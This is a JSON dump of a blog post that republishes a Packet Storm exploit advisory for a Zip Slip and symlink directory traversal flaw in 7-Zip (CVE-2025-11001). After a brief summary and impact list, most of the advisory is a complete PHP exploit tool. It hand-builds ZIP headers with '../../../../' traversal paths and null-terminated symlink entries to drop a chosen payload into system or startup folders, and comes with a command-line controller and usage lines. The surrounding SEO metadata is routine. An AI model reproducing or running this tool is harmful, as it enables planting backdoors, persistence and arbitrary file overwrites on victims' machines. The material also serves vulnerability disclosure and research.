{"id":27745,"date":"2025-11-26T12:50:34","date_gmt":"2025-11-26T12:50:34","guid":{"rendered":"http:\/\/localhost\/?p=27745"},"modified":"2025-11-26T12:50:34","modified_gmt":"2025-11-26T12:50:34","slug":"7-zip-2500-zip-slip-directory-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27745","title":{"rendered":"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:15:31&#8243;,&#8221;description&#8221;:&#8221;7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212101&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-11001&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability                                                              |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.7-zip.org\/                                                                                                      |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/211932\/ \\u0026 CVE-2025-11001 \\n    \\n    [+] Summary :\\n    \\n    Multiple archive extraction implementations, including 7\u2011Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.\\n    An attacker can craft a malicious ZIP archive containing:\\n    \\n    Directory traversal sequences (..\/..\/..\/)\\n    \\n    Symlink entries\\n    \\n    Manipulated extra fields\\n    \\n    Null\u2011byte terminated link targets\\n    \\n    This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.\\n    \\n    [+] Vulnerability Class :\\n    \\n    Directory Traversal\\n    \\n    Arbitrary File Write\\n    \\n    Symlink Path Injection\\n    \\n    Null-byte truncation bug\\n    \\n    [+]  Affected Software :\\n    \\n    7\u2011Zip \\u003c 25.00 (Administrator-only exploitation on Windows)\\n    \\n    Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants&#8230;)\\n    \\n    Applications that use ZipArchive without proper sanitization\\n    \\n    [+] Impact\\n    \\n    A malicious ZIP archive allows an attacker to place files in arbitrary locations such as\\n    \\n    C:\\\\Windows\\\\System32\\\\\\n    C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\\\n    \/etc\/\\n    \/var\/www\/html\/\\n    \\n    \\n    [+] Possible consequences:\\n    \\n        Backdoor planting\\n    \\n        Privilege escalation\\n    \\n        Persistence via startup folders\\n    \\n        Overwriting sensitive files\\n    \\n        Gaining remote execution depending on file location created\\n    \\n    [+] Technical Details\\n    \\n    [+] Core Exploit Mechanism\\n    \\n    The attacker inserts filenames such as : ..\/..\/..\/..\/Windows\/System32\/evil.exe\\n    \\n    or a symlink entry:  evil.lnk  \u2192  ..\/..\/..\/..\/Users\/Public\/Documents\\\\0\\n    \\n    These paths bypass validators in 7\u2011Zip and other ZIP extractors when running with elevated privileges.\\n    \\n    poc\\n    \\n    \\u003c?php\\n    \/*\\n    ===========================================================\\n       By Indoushka (Nekaa Salah eddine)\\n    ===========================================================\\n    *\/\\n    \\n    \/* ===========================================================\\n       MODE 1 \u2014 Basic Zip Slip Exploit\\n       (Former: build_zip duplicated 4 times)\\n    =========================================================== *\/\\n    function poc_zip_slip($target_path, $payload_file, $output_zip)\\n    {\\n        if (!file_exists($payload_file)) { die(\\&#8221;[-] Payload not found\\\\n\\&#8221;); }\\n    \\n        $payload_name = basename($payload_file);\\n        $payload_data = file_get_contents($payload_file);\\n    \\n        $target = trim(str_replace(\\&#8221;\\\\\\\\\\&#8221;, \\&#8221;\/\\&#8221;, $target_path), \\&#8221;\/\\&#8221;) . \\&#8221;\/\\&#8221;;\\n        $traversal = \\&#8221;..\/..\/..\/..\/\\&#8221; . $target;\\n    \\n        $zip = new ZipArchive();\\n        if ($zip-\\u003eopen($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {\\n            die(\\&#8221;[-] Failed to create ZIP\\\\n\\&#8221;);\\n        }\\n    \\n        $zip-\\u003eaddFromString($traversal . $payload_name, $payload_data);\\n        $zip-\\u003eclose();\\n    \\n        echo \\&#8221;[+] PoC: Zip Slip ZIP created: $output_zip\\\\n\\&#8221;;\\n    }\\n    \\n    \\n    \/* ===========================================================\\n       MODE 2 \u2014 Manual Symlink ZIP Creator\\n    =========================================================== *\/\\n    function poc_symlink_zip($target_path, $output_zip)\\n    {\\n        $target = trim(str_replace(\\&#8221;\\\\\\\\\\&#8221;, \\&#8221;\/\\&#8221;, $target_path), \\&#8221;\/\\&#8221;) . \\&#8221;\/\\&#8221;;\\n        $traversal = \\&#8221;..\/..\/..\/..\/\\&#8221; . $target;\\n    \\n        $name = \\&#8221;evil.lnk\\&#8221;;\\n        $link = $traversal . \\&#8221;\\\\x00\\&#8221;;\\n    \\n        $extra  = pack(\\&#8221;v\\&#8221;, 0x756e);\\n        $extra .= pack(\\&#8221;v\\&#8221;, strlen($link));\\n        $extra .= $link;\\n    \\n        $local = pack(\\&#8221;VvvvvvVVVvv\\&#8221;,\\n            0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,\\n            strlen($name), strlen($extra)\\n        );\\n    \\n        file_put_contents($output_zip, $local . $name . $extra);\\n    \\n        echo \\&#8221;[+] PoC: Symlink ZIP created: $output_zip\\\\n\\&#8221;;\\n    }\\n    \\n    \\n    \/* ===========================================================\\n       MODE 3 \u2014 Full Manual ZIP Builder (Symlink + Payload)\\n    =========================================================== *\/\\n    function poc_manual_zip($target_path, $payload_file, $output_zip)\\n    {\\n        if (!file_exists($payload_file)) { die(\\&#8221;[-] Missing payload\\\\n\\&#8221;); }\\n    \\n        $payload_name  = basename($payload_file);\\n        $payload_data  = file_get_contents($payload_file);\\n    \\n        $target = trim(str_replace(\\&#8221;\\\\\\\\\\&#8221;, \\&#8221;\/\\&#8221;, $target_path), \\&#8221;\/\\&#8221;) . \\&#8221;\/\\&#8221;;\\n        $trav   = \\&#8221;..\/..\/..\/..\/\\&#8221; . $target;\\n    \\n        $ln_name   = \\&#8221;evil.lnk\\&#8221;;\\n        $ln_target = $trav . \\&#8221;\\\\x00\\&#8221;;\\n        $ln_extra  = pack(\\&#8221;v\\&#8221;, 0x756e).pack(\\&#8221;v\\&#8221;,strlen($ln_target)).$ln_target;\\n    \\n        $f = fopen($output_zip, \\&#8221;wb\\&#8221;);\\n        $off = 0;\\n    \\n        \/\/ Local: Symlink\\n        $h1 = pack(\\&#8221;VvvvvvVVVvv\\&#8221;,\\n            0x04034b50,20,0&#215;800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)\\n        );\\n        fwrite($f, $h1.$ln_name.$ln_extra);\\n        $symlink_offset = $off;\\n        $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);\\n    \\n        \/\/ Local: Payload\\n        $h2 = pack(\\&#8221;VvvvvvVVVvv\\&#8221;,\\n            0x04034b50,20,0&#215;800,0,0,0,0,strlen($payload_data),strlen($payload_data),\\n            strlen($payload_name),0\\n        );\\n        fwrite($f, $h2.$payload_name.$payload_data);\\n        $payload_offset = $off;\\n        $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);\\n    \\n        \/\/ Central Directory\\n        $cd_start = $off;\\n    \\n        \/\/ CD: Symlink\\n        $cd1 = pack(\\&#8221;VvvvvvVVVvvvvvVV\\&#8221;,\\n            0x02014b50,0x0317,20,0&#215;800,0,0,0,0,0,0,\\n            strlen($ln_name),strlen($ln_extra),0,0,0,(0777\\u003c\\u003c16)|0xA1ED,$symlink_offset\\n        );\\n        fwrite($f, $cd1.$ln_name.$ln_extra);\\n    \\n        \/\/ CD: Payload\\n        $cd2 = pack(\\&#8221;VvvvvvVVVvvvvvVV\\&#8221;,\\n            0x02014b50,0x0317,20,0&#215;800,0,0,0,0,\\n            strlen($payload_data),strlen($payload_data),\\n            strlen($payload_name),0,0,0,0,(0777\\u003c\\u003c16),$payload_offset\\n        );\\n        fwrite($f, $cd2.$payload_name);\\n    \\n        \/\/ EOCD\\n        $eocd = pack(\\&#8221;VvvvvVVv\\&#8221;,\\n            0x06054b50,0,0,2,2,$off,$cd_start,0\\n        );\\n        fwrite($f, $eocd);\\n        fclose($f);\\n    \\n        echo \\&#8221;[+] PoC: Manual ZIP generated: $output_zip\\\\n\\&#8221;;\\n    }\\n    \\n    \\n    \/* ===========================================================\\n       MODE 4 \u2014 CVE\u20112025\u201111001 (7-Zip Directory Traversal)\\n    =========================================================== *\/\\n    function poc_cve_2025_11001($target, $payload, $output)\\n    {\\n        poc_manual_zip($target, $payload, $output);\\n    \\n        echo \\&#8221;[+] CVE-2025-11001 Archive Ready\\\\n\\&#8221;;\\n    }\\n    \\n    \\n    \/* ===========================================================\\n       CLI Controller\\n    =========================================================== *\/\\n    \\n    if (php_sapi_name() == \\&#8221;cli\\&#8221;)\\n    {\\n        $args = getopt(\\&#8221;\\&#8221;, [\\n            \\&#8221;mode:\\&#8221;,\\n            \\&#8221;target:\\&#8221;,\\n            \\&#8221;payload::\\&#8221;,\\n            \\&#8221;output::\\&#8221;\\n        ]);\\n    \\n        if (!isset($args[\\&#8221;mode\\&#8221;])) {\\n            die(\\&#8221;Usage:\\\\n\\n    php exploit.php &#8211;mode=zip-slip     &#8211;target=DIR &#8211;payload=file &#8211;output=out.zip\\n    php exploit.php &#8211;mode=symlink      &#8211;target=DIR &#8211;output=out.zip\\n    php exploit.php &#8211;mode=manual       &#8211;target=DIR &#8211;payload=file &#8211;output=out.zip\\n    php exploit.php &#8211;mode=cve-2025-11001 &#8211;target=DIR &#8211;payload=file &#8211;output=exp.zip\\n    \\&#8221;);\\n        }\\n    \\n        $mode   = $args[\\&#8221;mode\\&#8221;];\\n        $target = $args[\\&#8221;target\\&#8221;] ?? null;\\n        $payload= $args[\\&#8221;payload\\&#8221;] ?? null;\\n        $output = $args[\\&#8221;output\\&#8221;] ?? \\&#8221;exploit.zip\\&#8221;;\\n    \\n        switch ($mode) {\\n            case \\&#8221;zip-slip\\&#8221;:\\n                poc_zip_slip($target, $payload, $output);\\n                break;\\n    \\n            case \\&#8221;symlink\\&#8221;:\\n                poc_symlink_zip($target, $output);\\n                break;\\n    \\n            case \\&#8221;manual\\&#8221;:\\n                poc_manual_zip($target, $payload, $output);\\n                break;\\n    \\n            case \\&#8221;cve-2025-11001\\&#8221;:\\n                poc_cve_2025_11001($target, $payload, $output);\\n                break;\\n    \\n            default:\\n                echo \\&#8221;Unknown mode.\\\\n\\&#8221;;\\n        }\\n    }\\n    ?\\u003e\\n    \\n    \\n    Save as : poc.php\\n    \\n    run : php poc.php\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212101&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;3.0&#8243;,&#8221;vectorString&#8221;:&#8221;CVSS:3.0\/AV:L\/AC:H\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;baseScore&#8221;:7,&#8221;baseSeverity&#8221;:&#8221;HIGH&#8221;,&#8221;attackVector&#8221;:&#8221;LOCAL&#8221;,&#8221;attackComplexity&#8221;:&#8221;HIGH&#8221;,&#8221;privilegesRequired&#8221;:&#8221;NONE&#8221;,&#8221;userInteraction&#8221;:&#8221;REQUIRED&#8221;,&#8221;scope&#8221;:&#8221;UNCHANGED&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;integrityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;availabilityImpact&#8221;:&#8221;HIGH&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212101\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:15:31&#8243;,&#8221;description&#8221;:&#8221;7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-27745","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27745\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:15:31&#8243;,&#8221;description&#8221;:&#8221;7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27745\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-26T12:50:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101\",\"datePublished\":\"2025-11-26T12:50:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745\"},\"wordCount\":1233,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27745#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745\",\"name\":\"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-26T12:50:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27745\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27745#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27745","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:15:31&#8243;,&#8221;description&#8221;:&#8221;7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory...","og_url":"https:\/\/zero.redgem.net\/?p=27745","og_site_name":"zero redgem","article_published_time":"2025-11-26T12:50:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27745#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27745"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101","datePublished":"2025-11-26T12:50:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27745"},"wordCount":1233,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27745#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27745","url":"https:\/\/zero.redgem.net\/?p=27745","name":"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-26T12:50:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27745#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27745"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27745#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27745","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27745"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27745\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27745"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27745"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27745"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}